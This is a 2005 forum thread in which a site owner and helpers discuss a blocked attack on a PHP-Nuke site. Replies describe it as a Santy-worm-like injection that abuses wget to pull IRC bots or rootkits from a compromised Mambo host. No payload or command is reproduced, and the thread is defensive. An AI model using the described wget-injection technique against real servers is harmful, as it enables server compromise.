| Author |
Message |
ring_c
Involved
Joined: Dec 28, 2003
Posts: 276
Location: Israel
|
 Posted:
Mon Dec 19, 2005 12:02 am |
|
|
 
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Mon Dec 19, 2005 8:00 am |
|
well,to what i could find about it that it is an attack ,but because of the variety of types it couldnt point out the exact one.....im not sure.but it uses another site like vesdo..
It addresses the mailserver,phpbb,or even coppermine.
But a reply i found said also..."Looks like a variant of the santy worm to me, that also used LWP::Simple"
And that had the same contents of what you posted... |
| |
|
|
|
|
ring_c
|
| Posted:
Mon Dec 19, 2005 8:53 am |
|
Gee, you got me now hitwalker!
I was certain that's not an attack! gee...
Well, if NukeSentinel recognize it, do I have anything to fear from? |
| |
|
|
|
|
hitwalker
|
| Posted:
Mon Dec 19, 2005 9:08 am |
|
well dont take my word completely,i searched over and over with google using full lines of your post...
one thing is certain and that its described as an attach of gaining......whatever access to whatever...
Im not gonna post anything by making things up....
also a thing to keep in mind is that a lot of sites were abused remotely because some things on their server were vunerable.
but the abusive links to be used for other hackers are spread around but never "updated".
The site abused for whatever reason is vesdo.nl,and your attack lines are targeted for sites using phpbb,coppermine etc....and vesdo is a mambo cms site,and could easely be an old abused address still available in the search engines.
The combining urls you see with vesdo dont excist.
As you said..sentinel stopped it so no worries... |
| |
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Mon Dec 19, 2005 11:54 pm |
|
Yes, it is a cross-site scripting attack. WGet is a command to get something from the other server.. in this case at the vesdo.nl address. You'd probably find some nasty code in there to further compromise your system.
What I don't understand is that this IP is coming from Yahoo's Inktomi search engine. So someone is trying to hide their current IP probably.
You may need to contact the vesdo.nl server admins too, to see if you can get things removed from their server |
_________________
- Only registered users can see links on this board! Get registered or login! -
Need help? Only registered users can see links on this board! Get registered or login! |
|
|
|
|
ring_c
|
| Posted:
Tue Dec 20, 2005 1:58 am |
|
Evaders99, thank you.
I've addressed vesdo.nl's site owner/manager and added a link to this thread. maybe he'll want to explain something to us... |
| |
|
|
|
|
hitwalker
|
| Posted:
Tue Dec 20, 2005 5:51 am |
|
well i already did leave a message on his answering machine and maild him,no sign of life yet....
how greatfull some people are...  |
| |
|
|
|
|
ring_c
|
| Posted:
Tue Dec 20, 2005 8:59 am |
|
hitwalker, is there anything we can do without him?
Should we address Yahoo! as well? |
| |
|
|
|
|
hitwalker
|
| Posted:
Tue Dec 20, 2005 9:13 am |
|
No...
I already had a phonecall with the owner of the dutch site an hour ago..  .
He will be contacting his host to see if they can look into this as well.
They can check more then we can,its interesting to see what it is exactly and why his domain is used.
But i know a litle bit what the attackers intention was.
they wanted to use the cache of mambo.
If you look at the url you see its written like ..CACHE,well that doesnt excist.
But cache...does,thats simply from mambo itself....and something that can be turned on or off.
But mailing yahoo is realy useless..that company is born deaf and blind.. |
| |
|
|
|
|
ring_c
|
| Posted:
Tue Dec 20, 2005 9:29 am |
|
| hitwalker wrote: | But i know a litle bit what the attackers intention was.
they wanted to use the cache of mambo.
If you look at the url you see its written like ..CACHE,well that doesnt excist. |
What were they trying to do to my site? can you tell? |
| |
|
|
|
|
hitwalker
|
| Posted:
Tue Dec 20, 2005 9:40 am |
|
well only thing we know is that the commands they used are to get access..
But what exactly is hard to say but it comes to this....script kiddies build something that uses wget on the server side to download an IRC bot or rootkit.
wget will be called by passing it's name among a URL and probably some compiler, tar, mkdir, .. commands to an exploitable script on your server.
then you find wget in the query strings in your log files.
a litle bit of info i gathered..
but ill reply here again as i get a response again from that guy's website. |
| |
|
|
|
|
ring_c
|
| Posted:
Wed Dec 21, 2005 12:13 am |
|
Thanks for everything, hitwalker... |
| |
|
|
|
|
hitwalker
|
| Posted:
Wed Dec 21, 2005 2:49 pm |
|
well he got a reply and maild it but unfortunately with not that much info.
The detected a few things as well but didnt tell exactly what...,they did told him not to use the cache anymore...so thats it.. |
| |
|
|
|
|
ring_c
|
| Posted:
Wed Dec 21, 2005 2:58 pm |
|
Hmmm... dissapointing.. |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
